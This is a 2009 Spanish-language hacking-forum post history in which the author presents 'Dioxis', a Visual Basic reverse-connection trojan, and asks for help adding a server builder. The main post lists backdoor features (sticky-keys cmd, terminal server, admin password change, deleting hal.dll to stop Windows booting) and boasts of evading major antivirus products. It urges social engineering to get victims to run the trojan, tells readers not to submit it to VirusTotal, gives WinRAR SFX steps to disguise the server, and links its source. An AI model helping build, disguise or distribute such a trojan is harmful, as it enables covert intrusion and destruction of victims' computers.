elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 [36] 37 38 39 40 41 42 43 44 45
351  Seguridad Informática / Análisis y Diseño de Malware / Re: [Vb] Dioxis: Conexion Inversa by 50l3r en: 24 Mayo 2009, 17:03 pm
muchas gracias por la sugerencia, ya lo arregle

ya esta activa la descarga
352  Seguridad Informática / Análisis y Diseño de Malware / Re: [Vb] Dioxis: Conexion Inversa by 50l3r en: 24 Mayo 2009, 15:37 pm
Pondre para que podais cambiar el intervalo del timer, por si teneis muchos pcs remotos

luego el corte de conexion, eso se debe a que no puedo controlar los 4 formularios con un winsock control, sino no se cortaria
353  Seguridad Informática / Análisis y Diseño de Malware / Re: [Vb] Dioxis: Conexion Inversa by 50l3r en: 24 Mayo 2009, 13:41 pm
aji estamos jeje, he empezado hace 2 semanas en este mundillo, me lei entero el manual de aprenda vb como si estuviera en primer y de ahi en adelante empecé  a investigar yo solo

el troyano no esta hecho siguiendo un tutorial, lo que si, me inspiro el manual de Xenon, unicamente la primera parte, aun sigo leyendo el tutorial pero lo sigo por mi parte, como un manual mas y no copiando el codigo, y si hay alguna parte que no se investigo hasta dar la causa



Tengo esto en mente para que el cliente me genere el server clicando en un boton

Que por un inputbox te pida la ip a la que se vaya el server y luego genere todo el server en un exe y luego lo guarde en una ruta con un common dialog

pero como hago para guardar unicamente el server al darle al boton?

para resumir, quiero hacerlo como el bifrost, que te genere el cliente el servidor
354  Seguridad Informática / Análisis y Diseño de Malware / Re: [Vb] Dioxis: Conexion Inversa by 50l3r en: 24 Mayo 2009, 00:15 am
he visto el proyecto que has hecho ese que muestras en tu post eon, pero no entiendo mucho, en ese que generas el servidor desde el cliente?

eso es lo que deseo yo

quiero poner en el cliente un boton que te pregunte, a que ip quieres vincular el server?, pones una y te genera el server con esa ip, pero ahi no llego a entender mucho, haber si me puedes ayudar
355  Seguridad Informática / Análisis y Diseño de Malware / Re: [Vb] Dioxis: Conexion Inversa by 50l3r en: 23 Mayo 2009, 00:06 am
ahber si consigo crear en el cliente el servidor y sera todo vuestro, pero no lo subais a virustotal, y si vuestro antivirus envia los datos al servidor, no lo analizeis tampoco
356  Seguridad Informática / Análisis y Diseño de Malware / Re: [Vb] Dioxis: Conexion Inversa by 50l3r en: 22 Mayo 2009, 23:52 pm
batch tambien es menospreciado, y solo estamos hablando de batch, hay gente que hace juegos convoy a poner mas datos del software, entre ellos el peso y demas
357  Seguridad Informática / Análisis y Diseño de Malware / Re: [Vb] Dioxis: Conexion Inversa by 50l3r en: 22 Mayo 2009, 23:03 pm
si te refieres al numero de fichero que necesita, pues nada mas el server y el ocx del winsock para el que no lo tenga, esta compilado con el winrar jaja

El espacio es de 10 segundos, esta hecho con un timer pero vamos que se puede agrandar si el numero de clientes es elevado

si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno


a mi tampoco me gusta lo de que se reconecta todo el rato, porque como son diferentes formularios tuve que hacer diferentes controles winsock para cada uno, eso no sabia como arreglarlo ains

el oso rosa asesion es el famoso gloomy miren jeje:

http://images.google.es/images?client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hl=es&q=gloomy&btnG=Buscar+im%C3%A1genes&gbv=2&aq=f&oq=

porcierto puse una duda en vb6, quiero que el cliente genere el servidor, es decir que puedas cambiar la ip a la que va el servidor para que no todas vayan a m dominio no-ip, sino que la gente lo use para ellos, haber si me podeis ayudar y cuando acabe eso lo pongo

solucionado el error de que cuando el usuario se descnecta, no avisaba
358  Seguridad Informática / Análisis y Diseño de Malware / Re: [Vb] Dioxis: Conexion Inversa by 50l3r en: 22 Mayo 2009, 22:20 pm
yeah, me costo pero si, aun asi me falta mejorarle unas cosas ya que cuando se descoencta el servidor, el cliente no muestra la desconexion, fallo grave
359  Programación / Programación Visual Basic / Re: Como creo un .exe con vb en: 22 Mayo 2009, 18:09 pm
no te entendi muy bien, lo que yo quiero es crear el servidor desde el cliente ya que la ip a la que se conecta el servidor tiene que ser cambiada

necesito saber como pdoer crear el servidor desde mi cliente para terminar el Dioxis

haber si alguien me puede hechar una mano jeje, se lo agradeceria y con esto concluiria la 1 version del troyano
360  Seguridad Informática / Análisis y Diseño de Malware / [Vb] Dioxis: Conexion Inversa by 50l3r en: 22 Mayo 2009, 18:09 pm

Abstenganse Virustotal ;)


Tamaño servidor: 408 KB (Compilado con Winsck.ocx & dioxis.exe(servidor))
Tamaño Cliente: 544 KB
Archivos: Cliente Dioxis y libreria winsck.ocx
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: 666
Infraestructura: Red Local e internet


Funciones automatizadas:

Ejecucion de:

  • Paint
  • Teclado Universal
  • Buscaminas
  • Solitario
  • Pinball
  • Calculadora
  • Paseo de Win Xp
  • Star Wars
  • Mensajes personalizados
  • Paginas Web

Matanza de Procesos:


  • Messenger
  • Navegadores (Firefox,Iexplorer,Safari y Opera)
  • Explorador de Windows
  • Proceso Personalizado

Creacion de Puertas Traseras:

  • Habilitar terminal server
  • Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
  • Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:

  • Edicion de la contraseña de administracion a la que se quiera
  • Cierre de Sesion
  • Apagar Pc
  • ELIMINAR HAL.DLL (No se iniciara windows si no es reparado :/ )



¿Que es Dioxis?

Dioxis, a pesar de su simple interfaz, es un troyano de conexion inversa.

Utiliza la funcion shell, para ejecutar acciones, estas acciones estan divididas en 4 partes:

Modo Custom: Es el modo personalizado, si tienes ya conocimientos de lo que puedes hacer con "Ejecutar:" puedes escribir tus ordenes aqui para que sean procesadas en el ordenador remoto

Modo Funny: Es el modo divetido ^^. Puedes haces acciones tales como ejecutar paint, mandar mensajes, ponerle la tipica pelicula de star wars en modo ascii...etc


Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod


Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll...etc

He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel :P


Demostracion

Aqui os dejo unos minutos de la demostracion del troyano, es la 1 version, no la actualizada, pero no cambia mucho


¿Detectado?

El unico antivirus que hasta ahora me ha dado algun problema es el poco conocido avira, que lo detecta por heuristica pero te deja seguir trabajando con el, asi que si tienes una buena ingenieria social, podras colarselo, a continuacion los antivirus pasados:

Kapersky 2009



Nod32



Norton 2009



Panda global protection 2009



Avast

En este no tengo imagen, ya que nada mas analizarlo la ventana se cierra

Por ahora esos antivirus son con los que lo analize, si deseais que lo analize con otros me comentais

Otros Datos:

  • Añadida la funcion de eliminar Servidor y crearlo con el cliente
  • Ahora el tiempo de reconexion se configura al crear el server, igual que la ip
  • No hará falta conectarse y desconectarse al pasar entre modos[/b]

Instrucciones:

El Troyano consta de cliente y servidor, el servidor se crea con el cliente, y puede que necesite de la libreria de winsock (viene adjuntada con el software), asi que una vez creado el server seguid estos pasos:

1: Instalar el WINRAR y coged los archivos servidor y la libreria

2: Una vez tenemos el servidor y la libreria, cogemos los dos y con el winrar y le damos a añadir archivo, nos aparecera una ventana asi:


Le dais a crear archivo ejecutable o en mi caso a create sfx archive, el metodo de compresion que sea el mejor

3: A continuacion vete a la pestaña avanzado, te aparecerá esta ventana:


te vas a opciones de autoejecutable o sfx options

4: Te volvera a salir otra pestaña para poder decir el directorio en donde se instalara, y que se ejcutara antes o despues de la extraccion, rellenar segun la imagen


5: En la pestaña modos, selecciona segun la imagen, sobreescribir archivos y esconder todo


6: En esta pestaña podreis cambiar el icono de la aplicacion, luego das a aceptar todo y ya tendreis vuestro server








Descargar codigo fuente

Páginas: 1 ... 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 [36] 37 38 39 40 41 42 43 44 45
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines